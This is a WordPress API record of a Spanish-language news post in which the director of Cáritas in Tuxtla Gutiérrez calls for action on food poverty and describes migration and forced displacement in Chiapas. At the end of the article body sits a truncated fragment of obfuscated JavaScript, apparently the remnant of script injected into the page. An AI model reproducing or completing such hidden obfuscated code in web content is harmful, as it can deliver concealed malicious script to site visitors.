{"id":23515,"date":"2025-08-18T03:10:04","date_gmt":"2025-08-18T03:10:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23515"},"modified":"2025-08-18T03:10:05","modified_gmt":"2025-08-18T03:10:05","slug":"hacen-un-llamado-para-hacer-frente-a-la-pobreza-alimentaria","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23515","title":{"rendered":"Hacen un llamado para hacer frente a la pobreza alimentaria"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"384\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000283564.jpg\" alt=\"\" class=\"wp-image-23516\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000283564.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000283564-300x160.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000283564-310x165.jpg 310w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>17 de agosto del 2025. Tuxtla Guti\u00e9rrez.- El padre Gilberto Hern\u00e1ndez Garc\u00eda, asesor diocesano de la Pastoral Social y director de C\u00e1ritas en Tuxtla Guti\u00e9rrez hizo un llamado a los diferentes sectores para hacer frente a la pobreza alimentaria.<\/p>\n\n\n\n<p>Dijo que los esfuerzos continuos de la organizaci\u00f3n para asistir a los sectores m\u00e1s vulnerables, se\u00f1alando que la demanda de ayuda no cesa.<\/p>\n\n\n\n<p>&#8220;La caridad no tiene fin; siempre hay necesidades que atender&#8221;, expres\u00f3 el religioso, quien mencion\u00f3 que C\u00e1ritas recibe diariamente a personas en situaci\u00f3n de precariedad.<\/p>\n\n\n\n<p>Entre los principales retos est\u00e1 la seguridad alimentaria, agravada por el desempleo, la inflaci\u00f3n y las condiciones sociales adversas que enfrentan miles de familias.<\/p>\n\n\n\n<p>Para mitigar esta crisis, C\u00e1ritas implementa programas como la distribuci\u00f3n de despensas a adultos mayores y la operaci\u00f3n de comedores comunitarios en distintos puntos de la capital chiapaneca.<\/p>\n\n\n\n<p>Sin embargo, Hern\u00e1ndez Garc\u00eda advirti\u00f3 que estos esfuerzos no son suficientes ante el creciente n\u00famero de afectados.<\/p>\n\n\n\n<p>Migraci\u00f3n y desplazamiento: crisis invisibilizada<\/p>\n\n\n\n<p>Respecto al fen\u00f3meno migratorio, el director de C\u00e1ritas se\u00f1al\u00f3 que, aunque ha disminuido la presencia visible de migrantes en las calles de Tuxtla Guti\u00e9rrez, el flujo no se ha detenido.<\/p>\n\n\n\n<p>&#8220;Ya no hay campamentos como antes, pero el fen\u00f3meno persiste, solo ha cambiado su forma&#8221;, explic\u00f3.<\/p>\n\n\n\n<p>Adem\u00e1s, hizo hincapi\u00e9 en los desplazamientos forzados por la violencia en municipios como Frontera Comalapa, que han generado nuevas urgencias humanitarias.<\/p>\n\n\n\n<p>Ante esto, la organizaci\u00f3n mantiene su compromiso con migrantes, personas en situaci\u00f3n de calle y comunidades desplazadas, trabajando en colaboraci\u00f3n con otras entidades civiles y religiosas.<\/p>\n\n\n\n<p>Record\u00f3 que C\u00e1ritas opera mediante una extensa red eclesial que abarca m\u00e1s de 80 parroquias en 44 municipios de la arquidi\u00f3cesis.<\/p>\n\n\n\n<p>&#8220;Las parroquias son las primeras en responder en las zonas rurales; C\u00e1ritas fortalece su labor y act\u00faa directamente en casos cr\u00edticos&#8221;, detall\u00f3<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 17 de agosto del 2025. Tuxtla Guti\u00e9rrez.- El padre Gilberto Hern\u00e1ndez Garc\u00eda, asesor diocesano de la Pastoral Social y director de C\u00e1ritas en Tuxtla Guti\u00e9rrez hizo un llamado a los diferentes sectores para hacer frente a la pobreza alimentaria. Dijo que los esfuerzos continuos de la organizaci\u00f3n para asistir a los sectores m\u00e1s &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23516,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23515","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23515","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23515"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23515\/revisions"}],"predecessor-version":[{"id":23517,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23515\/revisions\/23517"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23516"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23515"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23515"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23515"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}